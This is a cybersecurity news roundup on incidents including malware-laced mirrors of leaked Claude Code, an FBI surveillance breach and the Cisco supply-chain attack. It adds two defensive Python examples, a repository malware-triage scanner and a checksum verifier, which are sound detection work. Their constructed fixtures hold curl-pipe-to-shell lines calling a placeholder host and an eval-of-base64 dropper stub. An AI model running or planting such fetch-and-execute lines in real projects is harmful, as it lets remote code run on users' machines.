
Malware-Laced Claude Code Repos and a Wave of Major Cybersecurity Incidents
From hackers embedding malware in leaked AI source code to a record-breaking botnet takedown, this week's cybersecurity landscape is intense.
Cybersecurity Roundup: Malware, Breaches, and Billion-Dollar Crypto Heists
This week in cybersecurity delivered no shortage of alarming developments — from government data exposed through basic internet searches to nation-state hackers targeting federal surveillance systems. Here's a breakdown of the most significant stories making waves across the security world.
Border Protection Data Found on a Flashcard App
In a startling discovery, WIRED revealed that sensitive facility information belonging to US Customs and Border Protection was publicly accessible through simple Google searches. The data, including gate access codes to CBP facilities, had been uploaded by users to Quizlet, a popular online study platform, presumably as study aids. The incident underscores the growing risk of employees inadvertently exposing sensitive operational details, physical access codes among them, through everyday consumer tools whose default sharing settings make uploaded content public and searchable.
Apple Issues Rare Patches for Older iOS Amid DarkSword Threat
Apple made an unusual decision this week, releasing security patches for iOS 18, an older version of its operating system, to shield users who have not yet upgraded to iOS 26. The patches target DarkSword, a dangerous exploit first identified in March that enables attackers to silently compromise iPhones simply by luring users to a malicious website; no tap or install is required beyond loading the page. After initially pushing users to upgrade to the latest iOS version, Apple reversed course and issued the backported fix as DarkSword infections continued to spread. Users who remain on iOS 18 should install the update now rather than wait for a major version upgrade.
US-Israel Conflict With Iran Threatens Tech Giants
Now entering its second month, the US-Israel military conflict with Iran is generating serious cybersecurity concerns for major American corporations. Iran has threatened to launch cyberattacks against more than a dozen US companies — including Apple, Google, and Microsoft — which maintain offices and data infrastructure throughout the Gulf region. The conflict continues to disrupt global trade, with shipping crews still stranded in the strategically critical Strait of Hormuz.
Hackers Weaponize Leaked Claude Code With Hidden Malware
Earlier this week, a security researcher discovered that Anthropic had accidentally made the source code for Claude Code, its widely used AI-driven coding assistant, publicly accessible. The leak quickly spread across GitHub as developers rushed to repost and archive the repositories. However, cybersecurity outlet BleepingComputer warned that not all of those uploads are safe: malicious actors have embedded infostealer malware inside some of the copied repositories, so anyone who clones and builds or installs one of those copies risks handing over the credentials, tokens and browser sessions that infostealers exist to collect. Public curiosity became the attack vector.
Anthropic responded swiftly, issuing copyright takedown notices targeting thousands of GitHub repositories. Though the company initially flagged more than 8,000 repos for removal, it later narrowed its legal action to approximately 96 copies and derivative works, according to The Wall Street Journal.
Not the First Claude Code Attack
This incident follows a similar campaign from March, when 404 Media reported that fraudulent Google-sponsored ads were directing users to fake Claude Code installation pages. Visitors were tricked into running terminal commands that secretly downloaded malware onto their systems. It is the classic paste-this-into-your-terminal lure: a one-liner that fetches and executes a script the user never sees, and it exploits the fact that many Claude Code users are unfamiliar with command-line interfaces and cannot tell a legitimate installer command from a malicious one.
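A cheap triage pass to run before anything in a re-uploaded repository, or a pasted install one-liner, gets executed, covering both the infostealer-laced mirrors and the fake-installer lure described above. This is an added example written for this roundup, not code from Anthropic, BleepingComputer or 404 Media, and nothing here reproduces the actual malware. The indicator list, the regexes and the sample tree it builds are this example's own assumptions; a hit means "read this file by hand", not "this is malware", and a clean run proves nothing.

```python
"""Heuristic triage of an untrusted source tree before anything in it runs.

Added example for this roundup; not Anthropic's code and not the tooling any
of the cited reports used. It flags cheap indicators that an infostealer
planted in a re-uploaded repository, or the one-liner on a fake installer
page, tends to rely on: package lifecycle hooks that execute on `npm install`,
`curl ... | sh` chains, eval() of a decoded blob, and long base64 literals.
The sample tree built below is constructed for the demo.
"""
from __future__ import annotations

import base64
import json
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Pattern names and regexes are this example's own choices, not a standard.
PATTERNS = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "eval_decoded": re.compile(r"\beval\s*\(\s*(atob|Buffer\.from|base64\.b64decode)\s*\("),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),
    "child_process_download": re.compile(r"child_process[^\n]*\b(curl|wget|powershell|iwr)\b"),
}
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
TEXT_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh", ".json", ".ps1", ".md", ""}


@dataclass(frozen=True)
class Finding:
    path: str
    kind: str
    evidence: str


def _check_package_json(path: Path, text: str) -> list[Finding]:
    """Lifecycle scripts run automatically on install; list them for review."""
    try:
        scripts = json.loads(text).get("scripts", {})
    except (json.JSONDecodeError, AttributeError):
        return []
    return [Finding(str(path), f"lifecycle_hook:{hook}", scripts[hook])
            for hook in LIFECYCLE_HOOKS if hook in scripts]


def scan_file(path: Path) -> list[Finding]:
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return []
    findings = _check_package_json(path, text) if path.name == "package.json" else []
    for kind, rx in PATTERNS.items():
        for m in rx.finditer(text):
            findings.append(Finding(str(path), kind, m.group(0)[:80]))
    return findings


def scan_repo(root: Path) -> list[Finding]:
    """Walk the tree (skipping .git) and collect findings from text-like files."""
    findings: list[Finding] = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and ".git" not in p.parts and p.suffix in TEXT_SUFFIXES:
            findings += scan_file(p)
    return findings


def build_sample_repo(malicious: bool = True) -> Path:
    """Constructed fixture: a small 'mirror' tree, optionally with a dropper."""
    root = Path(tempfile.mkdtemp(prefix="repo-"))
    (root / "src").mkdir()
    (root / "src" / "index.ts").write_text('export const VERSION = "1.0.0";\n')
    (root / "README.md").write_text("# Mirror\n\nRun `npm install` to set up.\n")
    scripts = {"build": "tsc", "test": "jest"}
    if malicious:
        scripts["postinstall"] = "node scripts/setup.js"   # runs on every install
        (root / "scripts").mkdir()
        blob = base64.b64encode(b"x" * 100).decode()      # stands in for a packed stealer
        (root / "scripts" / "setup.js").write_text(
            'const cp = require("child_process");\n'
            f'const payload = "{blob}";\n'
            'eval(Buffer.from(payload, "base64").toString());\n')
        (root / "install.sh").write_text(
            "#!/bin/sh\ncurl -fsSL https://example.invalid/cc.sh | sh\n")
    (root / "package.json").write_text(json.dumps({"name": "mirror", "scripts": scripts}))
    return root


if __name__ == "__main__":
    for f in scan_repo(build_sample_repo()):
        print(f"{f.kind:28} {f.path}: {f.evidence}")
```

The lifecycle-hook check is the one that matters most for a cloned repository: `npm install` executes `postinstall` without asking, so a stealer does not need the victim to run anything else. The `pipe_to_shell` pattern is the same shape as the fake-installer lure, whether it appears in a README or on a web page.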
FBI Declares Surveillance System Hack a National Security Incident
The FBI has officially designated a recent breach of one of its wiretap and surveillance collection systems as a "major incident" under the Federal Information Security Modernization Act (FISMA) — a classification reserved for breaches with serious national security implications. The declaration, reported to Congress this week, is reportedly the first such self-designation by the bureau since at least 2020.
According to Politico, senior Trump administration officials believe China is responsible for the intrusion. The FBI detected suspicious network activity in February, and a March 4 notification to Congress confirmed that the compromised systems — while unclassified — contained sensitive returns from legal processes, including phone and internet metadata collected under court orders and personal information related to active FBI investigations.
A Troubling Pattern of FBI Breaches
The latest hack fits into a broader and deeply concerning pattern. In 2023, a foreign actor accessed files tied to the FBI's Epstein investigation through an exposed forensic server. Last month, Iranian-linked hackers penetrated FBI Director Kash Patel's personal email account. And the Salt Typhoon campaign — attributed to Chinese hackers and uncovered in 2024 — compromised at least eight US telecom and internet service providers, ultimately affecting more than 200 companies across 80 countries.
College Student Helps Dismantle Record-Breaking Botnet Network
Two weeks ago, US law enforcement announced the successful dismantling of four interconnected botnets — Aisuru, Kimwolf, JackSkid, and Mossad — responsible for some of the largest distributed denial-of-service (DDoS) attacks ever recorded. These botnets hijacked thousands of internet-of-things devices to flood targets with overwhelming volumes of junk traffic.
The Wall Street Journal this week spotlighted an unexpected hero in the investigation: Benjamin Brundage, a 22-year-old student at the Rochester Institute of Technology. Brundage spent months obsessively tracking the Kimwolf botnet, infiltrating Discord communities, and gathering technical intelligence that he ultimately handed over to law enforcement. His work proved instrumental in the operation's success and highlights the growing role that independent security researchers play in combating large-scale cybercrime.
North Korean Hackers Steal $280 Million From Crypto Platform Drift
The decentralized finance platform Drift has confirmed that $280 million was stolen in a cybersecurity breach, with blockchain analytics firm Elliptic pointing to North Korean state-sponsored hackers as the likely culprits. Investigators cited distinctive laundering patterns and network-level indicators consistent with previous North Korean operations.
The theft accounts for the vast majority of the estimated $300 million in cryptocurrency stolen by North Korean hackers so far in 2026. While massive, that year-to-date figure still falls well short of the roughly $2 billion the regime's cyber operatives stole over the whole of last year, and with most of 2026 still ahead the total is unlikely to stay there.
Cisco Source Code Compromised in Supply Chain Attack
Networking giant Cisco became the latest high-profile victim of a software supply chain attack orchestrated by the hacker group TeamPCP. According to BleepingComputer, the attackers compromised the vulnerability scanning tool Trivy by injecting malicious code into it, then used the access the trojanized tool gave them to steal developer credentials and breach Cisco's internal development environments, making off with portions of the company's source code and that of some of its clients.
The Cisco incident is part of a broader campaign by TeamPCP, which has also infiltrated the AI software platform LiteLLM and the developer security tool Checkmarx using similar methods. The group's approach, embedding malware into widely trusted software tools, makes detection difficult and amplifies the potential damage across entire developer ecosystems. A security scanner is an attractive target precisely because it runs with access to the source trees and CI secrets it is meant to protect; pinning such tools to known-good versions and digests, and treating the credentials they hold like any other privileged account, limits how far a single poisoned release can reach.
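One control a build pipeline can apply before it executes a third-party scanner is to check each downloaded artifact against a checksum manifest committed alongside the pipeline, so a binary swapped at the download source no longer matches. The example below is added for this roundup; it is not Cisco's, Trivy's or TeamPCP's code and does not reproduce how the reported compromise worked. The file names, digests and the `sha256sum`-style manifest format it parses are constructed for the demo. The caveat a practitioner should keep in mind: the manifest must not be fetched from the same place as the artifact, because an attacker who can replace the binary can replace a co-hosted manifest as well.

```python
"""Verify downloaded tool binaries against a checksum manifest pinned in-repo.

Added example for this roundup; not Cisco's, Trivy's or TeamPCP's code.
Artifact names and contents below are a constructed fixture.
"""
from __future__ import annotations

import hashlib
import hmac
import os
import re
import tempfile
from pathlib import Path

# sha256sum(1) output: 64 hex chars, whitespace (' *' in binary mode), then the name.
MANIFEST_LINE = re.compile(r"^([0-9a-fA-F]{64})\s+\*?(\S.*)$")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text: str) -> dict[str, str]:
    """Map artifact name -> expected hex digest; reject anything but a bare file name."""
    expected: dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = MANIFEST_LINE.match(line)
        if not m:
            raise ValueError(f"malformed manifest line: {line!r}")
        name = m.group(2)
        if name != os.path.basename(name) or name in ("", ".", ".."):
            raise ValueError(f"manifest entry escapes the artifact directory: {name!r}")
        expected[name] = m.group(1).lower()
    return expected


def verify_dir(manifest_text: str, directory: Path) -> dict[str, str]:
    """Return {name: 'ok' | 'mismatch' | 'missing' | 'unlisted'} for every artifact."""
    expected = parse_manifest(manifest_text)
    result: dict[str, str] = {}
    for name, digest in expected.items():
        p = Path(directory) / name
        if not p.is_file():
            result[name] = "missing"
        elif hmac.compare_digest(sha256_of(p), digest):
            result[name] = "ok"
        else:
            result[name] = "mismatch"
    for p in Path(directory).iterdir():
        if p.is_file() and p.name not in expected:
            result[p.name] = "unlisted"   # present on disk but never pinned: do not run it
    return result


def safe_to_run(manifest_text: str, directory: Path, name: str) -> bool:
    """Gate: execute `name` only if it is listed and its digest matches."""
    return verify_dir(manifest_text, directory).get(name) == "ok"


def build_fixture() -> tuple[str, Path]:
    """Constructed: three pinned artifacts, one of them swapped after the manifest was pinned."""
    d = Path(tempfile.mkdtemp(prefix="artifacts-"))
    good = b"\x7fELF fake scanner build 1.2.3 linux/amd64\n"
    original_mac = b"\xcf\xfa\xed\xfe fake scanner build 1.2.3 darwin/arm64\n"
    (d / "scanner-linux-amd64").write_bytes(good)
    # The macOS build on the download host has been replaced; the digest was pinned from the original.
    (d / "scanner-darwin-arm64").write_bytes(original_mac + b"; curl https://example.invalid/s | sh\n")
    (d / "stray.bin").write_bytes(b"not in the manifest\n")
    manifest = "\n".join([
        "# checksums committed with the pipeline, taken from the trusted release",
        f"{hashlib.sha256(good).hexdigest()}  scanner-linux-amd64",
        f"{hashlib.sha256(original_mac).hexdigest()}  scanner-darwin-arm64",
        f"{hashlib.sha256(b'never downloaded').hexdigest()}  scanner-windows-amd64.exe",
    ])
    return manifest, d


if __name__ == "__main__":
    manifest, d = build_fixture()
    for name, status in sorted(verify_dir(manifest, d).items()):
        print(f"{status:9} {name}")
    print("run linux build:", safe_to_run(manifest, d, "scanner-linux-amd64"))
```

A digest pin only protects the download step; it does nothing about a release that was malicious at the moment its checksum was recorded. Pairing it with a review of what changed between pinned versions, and with scoped credentials for whatever process runs the tool, covers the case the pin cannot.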
Stay Vigilant
From leaked AI source code turned into malware distribution channels, to state-sponsored hackers targeting federal law enforcement infrastructure, the cybersecurity threat landscape continues to evolve at a rapid pace. The stories above point to a few concrete habits: install software from the publisher's own channel and check its published checksum or signature rather than trusting a reposted copy; never paste a terminal command from an ad or an unfamiliar page without reading what it fetches; apply operating system patches promptly, including ones backported to older releases; and, for organizations, pin the versions of build and security tooling so a poisoned release cannot slip into the pipeline unnoticed.
